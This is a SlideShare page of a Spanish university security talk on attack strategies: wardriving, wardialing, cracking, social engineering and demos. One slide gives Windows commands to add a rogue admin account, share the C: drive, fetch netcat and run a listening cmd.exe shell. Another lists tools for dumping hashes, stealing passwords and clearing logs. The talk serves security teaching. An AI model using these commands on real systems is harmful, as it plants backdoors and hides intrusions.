SlideShare une entreprise Scribd logo
1  sur  18
Télécharger pour lire hors ligne
ESTRATEGIAS DE
ATAQUE EN SEGURIDAD
    INFORMATICA

  Grupo de I+D en Tecnologías de la
         Información (GTI)
           (Esp) Siler Amador Donado
           samador@unicauca.edu.co
       http://gseguridad.unicauca.edu.co
AGENDA
 Hackers vs Crackers
 El riesgo en la seguridad informática
 Pérdidas económicas por ataques informáticos
 Técnicas de ataque
 Vectores de ataque a una red
 Y si tienen la oportunidad…
 Caja de herramientas de ataque
 La próxima generación de Troyanos Keylogers
 Demo 1 (Ataque Masivo)
 Demo 2 (Defaced)
 … Y en la Unicauca que?
 Conclusiones
HACKERS VS CRACKERS


             As                                   Eg
               es                                   oís
                 or
                   an                                  ta s




                            Delinc uente s
Eti ca




         Hackers                             Crackers

                       en                                  n
                     uy                                u ye
                ns
                  tr                                str
             Co                                   De
EL RIESGO EN LA SEGURIDAD
INFORMÁTICA
PÉRDIDAS POR ATAQUES
CCS/FBI 2005
PÉRDIDAS POR ATAQUES
CCS/FBI 2005



   $67.2 billones por año

   $7.6 millones por hora
TECNICAS DE ATAQUE
Wardriving:         Nombre que recibe la búsqueda de redes
 inalámbricas para documentar su posición. Para realizar esta
 búsqueda se necesita como mínimo un equipo móvil (portátil) con
 tarjeta Wireless, y si queremos que la posición sea precisa, un GPS
 para pasar los datos a un mapa.

Objetivo:     Conectarse al punto de acceso (AP) mal configurado e
 ingresar a la la red local de la empresa.

Herramientas:
 NetStumbler
 Kismet
 http://www.wardrive.net/wardriving/tools
TECNICAS DE ATAQUE
Wardialing:       Fue una técnica de los 80´s y 90´s, consitía en
 marcar repetidamente a modems y PBX´s disponibles en la red y de
 esta forma irrumpir a sistemas remotos.

Objetivo:      Conectarse a modems o PBX´s mal configurados e
 ingresar a la la red local de la empresa.

Herramientas:
 THC-Scan 2.0
 ModemScan
 ShokDial
TECNICAS DE ATAQUE
Cracking:      Modificar un programa para obtener beneficios.
 Normalmente se basa en quitar pantallas introductorias,
 protecciones o, como en unas modificaciones de cierto programa de
 comunicaciones, conseguir nuevos passwords de acceso a
 sistemas.

Objetivo:
 Tener acceso al software o a la red interna.

Herramientas:
 Las 100 mejores http://sectools.org/
 Inyección SQL
 XSS
TECNICAS DE ATAQUE
Ing. Social:       Persuadir a otra persona (a través de diversas
 formas) para que nos de un dato útil para cumplir un objetivo. Este
 dato puede ser un password, un código, etc. incluso pueden dar
 nombres de familiares y fechas importantes, que siempre se usan
 para formar claves.
Objetivo:      Obtener información sensible que nos permita el
 acceso a la red.
Herramientas:
 Teléfono
 Mucha psicología
 Inteligencia emocional
 http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
VECTORES DE ATAQUE A UNA RED
Puntos de acceso
                           Wardriving


                           WIRELESS




                                                 Wardialing
                                                 Wardialing
                INTERNET
     Cracking




                                         MODEM
                                         MODEM
                             RED

                              FISICO




                           Ing. Social
Y si tienen la oportunidad…
  Menos de 1 minuto es suficiente para:
 1. Crear una cuenta con privilegios de Admin!!!
      1. Abrir la consola de comandos
      2. C:net user cracker siti2006 /add
      3. C:net localgroup administradores cracker /add
 2. Compartir toda la unidad del disco!!!
      1. C:net share siti2006=c: /remark:”Demo SITI2006”
 3. Colocar un programa en escucha!!!
      1. http://gseguridad.unicauca.edu.co/nc.exe
      2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
Caja de Herramientas de ataque en
línea de comandos
fport.exe - shows open ports and the process that owns the port
iplist.exe - enumerates the ip's of the computer
md5.exe - gets the md5 hash of a file
pw2kget.exe - for win2k gets the password of the currently logged on user
pwreveal.exe - gets the passwords of any window that has a ****** editbox
regshell.exe - a commandline registry explorer/editor
sendmail.exe - a commandline email sender
uptime.exe - gets the machines current uptime
xwhois - advanced whois lookup
Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp
CMDget.exe - Downloads a file from a website from user provided parameters
webscr.exe - creates a snapshot from the webcam and saves it
shutd.exe - program that forces shutdown/reboot of machine
bnc.exe - bnc for windows (see bnc.cfg)
clslog.exe - clears app/security/system logs XP/NT/2k
enum.exe - enumerates IPC$ share to collect information
winfo.exe - enumerates IPC$ share to collect information
FTPd.exe - small ftp server for dos (see slimftpd.conf)
Global.exe - process dos command on all disc/subdirs
iislog.exe - clears IIS logs
Info.exe - gets system information
ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)
nc.exe - netcat
pv.exe - process manager for dos
Pwdump.exe - dumps SAM hashes
scrnmode.exe - change screen mode from dos
unrar.exe - unrar for dos
wget.exe - wget for windows
wizmo.exe - command tool (see w.txt)
dwpp.exe - dial up password graber
winrelay.exe - relay tcp/udp connections
getad.exe - escalate to admin user in w2k
pipeup.exe - escalate to admin user in w2k
dnsid - identify remore dns server

                                                                               Agradecimientos a: Netranger
                          Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
LA PRÓXIMA GENERACION DE
TROYANOS KEYLOGERS…



http://www.hispasec.com/laboratorio/troyano_video.htm
DEMO1 - ATAQUE MASIVO
 Escenario


                                                              ZOMBIES




     ATACANTE                           MAESTRO
      Windows                              Linux
                                         Metasploit
                                                                 Win/XP/2K
                                     Scripts en Python

                SITI 2006                            LAN



http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
DEMO2 - DEFACED


        http://www.zone-h.com


         VIDEO RUSO
... Y en la Unicauca que?
Preocupación del departamento de sistemas de la FIET sobre
la problemática de la seguridad de la información.
 • Electiva de seguridad informática
 • Área de interés en seguridad informática del GTI. (Proyectos de tesis
   de grado)
    • Legislación en comercio electrónico (Finalizado)
    • OBSES (Firewall Cluster Beowulf) (Finalizado)
    • INFORCE (Finalizado)
    • Antivirus-inteligente (En desarrollo)
    • Estudio de las tendencias predictivas sobre la escogencia de
       contraseñas basado en redes bayesianas (En desarrollo)
 • Proyecto de Auditoría informática UNICAUCA
 • Publicaciones
CONCLUSIONES
 Los ataques de seguridad informática a nivel mundial son
 aislados? Inversión en guerra informática? ECHELON,
 ENFOPOL, CARNÍVORO…
  •   USA
  •   UK
  •   CHINA
  •   RUSIA
 Los sistemas de seguridad actuales son reactivos y correctivos.
  •   Preventivos
  •   Inteligentes
 Existen demasiadas herramientas de ataque gratis y
 disponibles en la red.
 Las técnicas de ataque cabian constantemente.
 Segun las estadísticas es muy probable que su sistema haya
 sido vulnerado y usted aún no lo sepa!!!.

Contenu connexe

Tendances

Escaneo Y DenegacióN De Servicio
Escaneo Y DenegacióN De ServicioEscaneo Y DenegacióN De Servicio
Escaneo Y DenegacióN De Servicioseguridadutpl
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to usnavajanegra
 
Ventajas y desventajas de los antivirus
Ventajas y desventajas de los antivirusVentajas y desventajas de los antivirus
Ventajas y desventajas de los antivirusEmmanuel Juarez Romero
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...RootedCON
 
Jesus manuel viesca vazquez ...
Jesus manuel viesca vazquez ...Jesus manuel viesca vazquez ...
Jesus manuel viesca vazquez ...Jesus Vazquez
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)TR Hirecom
 
Delicuentes informaticos
Delicuentes informaticosDelicuentes informaticos
Delicuentes informaticosdanitamab
 
Seguridad inalámbrica
Seguridad inalámbricaSeguridad inalámbrica
Seguridad inalámbricatena10
 
Contenidos del VídeoBook de "Pentesting con Kali 2020"
Contenidos del VídeoBook de "Pentesting con Kali 2020"Contenidos del VídeoBook de "Pentesting con Kali 2020"
Contenidos del VídeoBook de "Pentesting con Kali 2020"Telefónica
 
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...RootedCON
 
Estructura¨¨natalia paola
Estructura¨¨natalia paolaEstructura¨¨natalia paola
Estructura¨¨natalia paolaLeidygamboa153
 
Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]
Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]
Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]RootedCON
 

Tendances (15)

Escaneo Y DenegacióN De Servicio
Escaneo Y DenegacióN De ServicioEscaneo Y DenegacióN De Servicio
Escaneo Y DenegacióN De Servicio
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
 
Ventajas y desventajas de los antivirus
Ventajas y desventajas de los antivirusVentajas y desventajas de los antivirus
Ventajas y desventajas de los antivirus
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
 
Jesus manuel viesca vazquez ...
Jesus manuel viesca vazquez ...Jesus manuel viesca vazquez ...
Jesus manuel viesca vazquez ...
 
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
 
Delicuentes informaticos
Delicuentes informaticosDelicuentes informaticos
Delicuentes informaticos
 
Antivirus y definiciones
Antivirus y definicionesAntivirus y definiciones
Antivirus y definiciones
 
Seguridad
SeguridadSeguridad
Seguridad
 
Seguridad inalámbrica
Seguridad inalámbricaSeguridad inalámbrica
Seguridad inalámbrica
 
Contenidos del VídeoBook de "Pentesting con Kali 2020"
Contenidos del VídeoBook de "Pentesting con Kali 2020"Contenidos del VídeoBook de "Pentesting con Kali 2020"
Contenidos del VídeoBook de "Pentesting con Kali 2020"
 
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
 
Estructura¨¨natalia paola
Estructura¨¨natalia paolaEstructura¨¨natalia paola
Estructura¨¨natalia paola
 
Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]
Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]
Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]
 
Anti
AntiAnti
Anti
 

En vedette

Tipos de Ataques Informaticos
Tipos de Ataques InformaticosTipos de Ataques Informaticos
Tipos de Ataques Informaticossm2099
 
Amenazas y vulnerabilidades en la informática
Amenazas y vulnerabilidades en la informáticaAmenazas y vulnerabilidades en la informática
Amenazas y vulnerabilidades en la informáticaCarolina Cols
 
Tipos de ataques y vulnerabilidades en una red
Tipos de ataques y vulnerabilidades en una redTipos de ataques y vulnerabilidades en una red
Tipos de ataques y vulnerabilidades en una redmamuga
 
Conceptos sobre amenazas vulnerabilidad
Conceptos sobre amenazas vulnerabilidadConceptos sobre amenazas vulnerabilidad
Conceptos sobre amenazas vulnerabilidadnicolaslargoceballos
 
Clase riesgos-amenazas-vulnerabilidades
Clase riesgos-amenazas-vulnerabilidadesClase riesgos-amenazas-vulnerabilidades
Clase riesgos-amenazas-vulnerabilidadessimondavila
 

En vedette (7)

Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
 
Presentacion Guia OWASP 2014
Presentacion Guia OWASP 2014Presentacion Guia OWASP 2014
Presentacion Guia OWASP 2014
 
Tipos de Ataques Informaticos
Tipos de Ataques InformaticosTipos de Ataques Informaticos
Tipos de Ataques Informaticos
 
Amenazas y vulnerabilidades en la informática
Amenazas y vulnerabilidades en la informáticaAmenazas y vulnerabilidades en la informática
Amenazas y vulnerabilidades en la informática
 
Tipos de ataques y vulnerabilidades en una red
Tipos de ataques y vulnerabilidades en una redTipos de ataques y vulnerabilidades en una red
Tipos de ataques y vulnerabilidades en una red
 
Conceptos sobre amenazas vulnerabilidad
Conceptos sobre amenazas vulnerabilidadConceptos sobre amenazas vulnerabilidad
Conceptos sobre amenazas vulnerabilidad
 
Clase riesgos-amenazas-vulnerabilidades
Clase riesgos-amenazas-vulnerabilidadesClase riesgos-amenazas-vulnerabilidades
Clase riesgos-amenazas-vulnerabilidades
 

Similaire à Estrategias de Ataque y Defensa

Mac os x & malware en tu empresa
Mac os x & malware en tu empresaMac os x & malware en tu empresa
Mac os x & malware en tu empresaEventos Creativos
 
Vista sucks
Vista sucksVista sucks
Vista suckswozgeass
 
Test básico de seguridad informática
Test básico de seguridad informáticaTest básico de seguridad informática
Test básico de seguridad informáticasylvia1999
 
HerramientasExplotacion-GRUPO5.pptx
HerramientasExplotacion-GRUPO5.pptxHerramientasExplotacion-GRUPO5.pptx
HerramientasExplotacion-GRUPO5.pptxJhoseC1
 
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicioCamilo Fernandez
 
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITYMemorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITYAranda Software
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínWebsec México, S.C.
 
Redes 1 gabriel rojas
Redes 1 gabriel rojasRedes 1 gabriel rojas
Redes 1 gabriel rojassneiderr
 
Transparencia resumen examen final
Transparencia  resumen examen finalTransparencia  resumen examen final
Transparencia resumen examen finalRuben Torres Bazan
 
Javier Rodríguez & David Sánchez - ¿Otra vez tú, Tovarich? [rooted2018]
Javier Rodríguez & David Sánchez - ¿Otra vez tú, Tovarich? [rooted2018]Javier Rodríguez & David Sánchez - ¿Otra vez tú, Tovarich? [rooted2018]
Javier Rodríguez & David Sánchez - ¿Otra vez tú, Tovarich? [rooted2018]RootedCON
 
Amenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informaticaAmenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informaticafillescas
 

Similaire à Estrategias de Ataque y Defensa (20)

Técnicas de Intrusión
Técnicas de IntrusiónTécnicas de Intrusión
Técnicas de Intrusión
 
Hacking withinnails pdfcompleto
Hacking withinnails pdfcompletoHacking withinnails pdfcompleto
Hacking withinnails pdfcompleto
 
Mac os x & malware en tu empresa
Mac os x & malware en tu empresaMac os x & malware en tu empresa
Mac os x & malware en tu empresa
 
Vista sucks
Vista sucksVista sucks
Vista sucks
 
Seguridad anti hacking
Seguridad anti hacking  Seguridad anti hacking
Seguridad anti hacking
 
S.oper 180604.pps[1]
S.oper 180604.pps[1]S.oper 180604.pps[1]
S.oper 180604.pps[1]
 
Desarrollo de aplicaciones seguras
Desarrollo de aplicaciones segurasDesarrollo de aplicaciones seguras
Desarrollo de aplicaciones seguras
 
Smart Grids y ciberseguridad
Smart Grids y ciberseguridadSmart Grids y ciberseguridad
Smart Grids y ciberseguridad
 
Test básico de seguridad informática
Test básico de seguridad informáticaTest básico de seguridad informática
Test básico de seguridad informática
 
HerramientasExplotacion-GRUPO5.pptx
HerramientasExplotacion-GRUPO5.pptxHerramientasExplotacion-GRUPO5.pptx
HerramientasExplotacion-GRUPO5.pptx
 
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicio
 
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITYMemorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
 
Redes 1 gabriel rojas
Redes 1 gabriel rojasRedes 1 gabriel rojas
Redes 1 gabriel rojas
 
Transparencia resumen examen final
Transparencia  resumen examen finalTransparencia  resumen examen final
Transparencia resumen examen final
 
Seguridad 1
Seguridad 1Seguridad 1
Seguridad 1
 
Javier Rodríguez & David Sánchez - ¿Otra vez tú, Tovarich? [rooted2018]
Javier Rodríguez & David Sánchez - ¿Otra vez tú, Tovarich? [rooted2018]Javier Rodríguez & David Sánchez - ¿Otra vez tú, Tovarich? [rooted2018]
Javier Rodríguez & David Sánchez - ¿Otra vez tú, Tovarich? [rooted2018]
 
Hackers
HackersHackers
Hackers
 
Hackers
HackersHackers
Hackers
 
Amenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informaticaAmenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informatica
 

Plus de Securinf.com Seguridad Informatica - Tecnoweb2.com

Plus de Securinf.com Seguridad Informatica - Tecnoweb2.com (20)

Emprendiendo con software libre-
 Emprendiendo con software libre- Emprendiendo con software libre-
Emprendiendo con software libre-
 
Jsl Colombia 2010 - Seguridad Informatica
Jsl Colombia 2010 - Seguridad InformaticaJsl Colombia 2010 - Seguridad Informatica
Jsl Colombia 2010 - Seguridad Informatica
 
Jsl ponencias v2_diego_salazar_perez
Jsl ponencias v2_diego_salazar_perezJsl ponencias v2_diego_salazar_perez
Jsl ponencias v2_diego_salazar_perez
 
Criptografia-GSeguridad
Criptografia-GSeguridadCriptografia-GSeguridad
Criptografia-GSeguridad
 
Linux seguro - Fedora Colombia
Linux seguro - Fedora ColombiaLinux seguro - Fedora Colombia
Linux seguro - Fedora Colombia
 
Certificacion iso17799 iso 27001 1
Certificacion iso17799 iso 27001 1Certificacion iso17799 iso 27001 1
Certificacion iso17799 iso 27001 1
 
Python workshop
Python workshopPython workshop
Python workshop
 
De Presa A Cazador
De Presa A Cazador De Presa A Cazador
De Presa A Cazador
 
Web 20 vision a la industria
Web 20 vision a la industriaWeb 20 vision a la industria
Web 20 vision a la industria
 
Open solaris
Open solarisOpen solaris
Open solaris
 
Análisis malware
Análisis malwareAnálisis malware
Análisis malware
 
Sftp rodrigo carreño
Sftp rodrigo carreñoSftp rodrigo carreño
Sftp rodrigo carreño
 
Instalacion drupal 1
Instalacion drupal 1Instalacion drupal 1
Instalacion drupal 1
 
Instalacion drupal 1
Instalacion drupal 1Instalacion drupal 1
Instalacion drupal 1
 
C:\Fake Path\Cauca
C:\Fake Path\CaucaC:\Fake Path\Cauca
C:\Fake Path\Cauca
 
Presentacion Joomla CMS
Presentacion Joomla CMSPresentacion Joomla CMS
Presentacion Joomla CMS
 
Securinf Barcamp
Securinf BarcampSecurinf Barcamp
Securinf Barcamp
 
Ciberneticavs Sistem Abiertos
Ciberneticavs Sistem AbiertosCiberneticavs Sistem Abiertos
Ciberneticavs Sistem Abiertos
 
Topologia
TopologiaTopologia
Topologia
 
Css
CssCss
Css
 

Dernier

Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21mariacbr99
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxFederico Castellari
 
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxAlan779941
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosJhonJairoRodriguezCe
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativanicho110
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.FlorenciaCattelani
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...JohnRamos830530
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanamcerpam
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estossgonzalezp1
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxJorgeParada26
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIhmpuellon
 

Dernier (11)

Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptx
 
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos Basicos
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXI
 

Estrategias de Ataque y Defensa

  • 1. ESTRATEGIAS DE ATAQUE EN SEGURIDAD INFORMATICA Grupo de I+D en Tecnologías de la Información (GTI) (Esp) Siler Amador Donado samador@unicauca.edu.co http://gseguridad.unicauca.edu.co
  • 2. AGENDA Hackers vs Crackers El riesgo en la seguridad informática Pérdidas económicas por ataques informáticos Técnicas de ataque Vectores de ataque a una red Y si tienen la oportunidad… Caja de herramientas de ataque La próxima generación de Troyanos Keylogers Demo 1 (Ataque Masivo) Demo 2 (Defaced) … Y en la Unicauca que? Conclusiones
  • 3. HACKERS VS CRACKERS As Eg es oís or an ta s Delinc uente s Eti ca Hackers Crackers en n uy u ye ns tr str Co De
  • 4. EL RIESGO EN LA SEGURIDAD INFORMÁTICA
  • 6. PÉRDIDAS POR ATAQUES CCS/FBI 2005 $67.2 billones por año $7.6 millones por hora
  • 7. TECNICAS DE ATAQUE Wardriving: Nombre que recibe la búsqueda de redes inalámbricas para documentar su posición. Para realizar esta búsqueda se necesita como mínimo un equipo móvil (portátil) con tarjeta Wireless, y si queremos que la posición sea precisa, un GPS para pasar los datos a un mapa. Objetivo: Conectarse al punto de acceso (AP) mal configurado e ingresar a la la red local de la empresa. Herramientas: NetStumbler Kismet http://www.wardrive.net/wardriving/tools
  • 8. TECNICAS DE ATAQUE Wardialing: Fue una técnica de los 80´s y 90´s, consitía en marcar repetidamente a modems y PBX´s disponibles en la red y de esta forma irrumpir a sistemas remotos. Objetivo: Conectarse a modems o PBX´s mal configurados e ingresar a la la red local de la empresa. Herramientas: THC-Scan 2.0 ModemScan ShokDial
  • 9. TECNICAS DE ATAQUE Cracking: Modificar un programa para obtener beneficios. Normalmente se basa en quitar pantallas introductorias, protecciones o, como en unas modificaciones de cierto programa de comunicaciones, conseguir nuevos passwords de acceso a sistemas. Objetivo: Tener acceso al software o a la red interna. Herramientas: Las 100 mejores http://sectools.org/ Inyección SQL XSS
  • 10. TECNICAS DE ATAQUE Ing. Social: Persuadir a otra persona (a través de diversas formas) para que nos de un dato útil para cumplir un objetivo. Este dato puede ser un password, un código, etc. incluso pueden dar nombres de familiares y fechas importantes, que siempre se usan para formar claves. Objetivo: Obtener información sensible que nos permita el acceso a la red. Herramientas: Teléfono Mucha psicología Inteligencia emocional http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
  • 11. VECTORES DE ATAQUE A UNA RED Puntos de acceso Wardriving WIRELESS Wardialing Wardialing INTERNET Cracking MODEM MODEM RED FISICO Ing. Social
  • 12. Y si tienen la oportunidad… Menos de 1 minuto es suficiente para: 1. Crear una cuenta con privilegios de Admin!!! 1. Abrir la consola de comandos 2. C:net user cracker siti2006 /add 3. C:net localgroup administradores cracker /add 2. Compartir toda la unidad del disco!!! 1. C:net share siti2006=c: /remark:”Demo SITI2006” 3. Colocar un programa en escucha!!! 1. http://gseguridad.unicauca.edu.co/nc.exe 2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
  • 13. Caja de Herramientas de ataque en línea de comandos fport.exe - shows open ports and the process that owns the port iplist.exe - enumerates the ip's of the computer md5.exe - gets the md5 hash of a file pw2kget.exe - for win2k gets the password of the currently logged on user pwreveal.exe - gets the passwords of any window that has a ****** editbox regshell.exe - a commandline registry explorer/editor sendmail.exe - a commandline email sender uptime.exe - gets the machines current uptime xwhois - advanced whois lookup Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp CMDget.exe - Downloads a file from a website from user provided parameters webscr.exe - creates a snapshot from the webcam and saves it shutd.exe - program that forces shutdown/reboot of machine bnc.exe - bnc for windows (see bnc.cfg) clslog.exe - clears app/security/system logs XP/NT/2k enum.exe - enumerates IPC$ share to collect information winfo.exe - enumerates IPC$ share to collect information FTPd.exe - small ftp server for dos (see slimftpd.conf) Global.exe - process dos command on all disc/subdirs iislog.exe - clears IIS logs Info.exe - gets system information ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir) nc.exe - netcat pv.exe - process manager for dos Pwdump.exe - dumps SAM hashes scrnmode.exe - change screen mode from dos unrar.exe - unrar for dos wget.exe - wget for windows wizmo.exe - command tool (see w.txt) dwpp.exe - dial up password graber winrelay.exe - relay tcp/udp connections getad.exe - escalate to admin user in w2k pipeup.exe - escalate to admin user in w2k dnsid - identify remore dns server Agradecimientos a: Netranger Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
  • 14. LA PRÓXIMA GENERACION DE TROYANOS KEYLOGERS… http://www.hispasec.com/laboratorio/troyano_video.htm
